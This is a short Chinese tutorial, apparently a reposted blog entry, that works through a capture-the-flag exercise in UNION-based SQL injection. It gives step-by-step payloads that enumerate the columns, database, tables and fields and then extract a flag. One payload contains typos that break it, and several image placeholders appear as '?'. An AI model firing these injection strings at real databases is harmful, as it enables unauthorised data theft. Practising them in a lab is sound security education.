sql注入联合查询
簡單聯合注入例題及過程
1需要獲取字段總數
2獲取數據庫
3獲取數據庫里面的表
4然后獲取數據庫里面表的字段
例題地址 http://123.206.87.240:9001/sql/
?
?
先判斷有幾列
?
?
?
由此可知有二列
?
獲取數據庫
1" union select 1,database() #
?
獲取表名
?
1" union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
補充:
| Table_schema | 數據表所屬的數據庫名 |
| Table_name | 表名稱 |
獲取列名
輸入
1" union select concat(column_name),2 from information schema. columns where table_ name = "flag1"#
得到了列名: flagl
?
爆內容
?
?1" union select flag1,2 from flag1#
?
?
轉載于:https://www.cnblogs.com/kongbai-lacie/p/10908041.html
總結
- 上一篇: OO第三单元JML总结
- 下一篇: 取出DataTime的年,月,日,时,分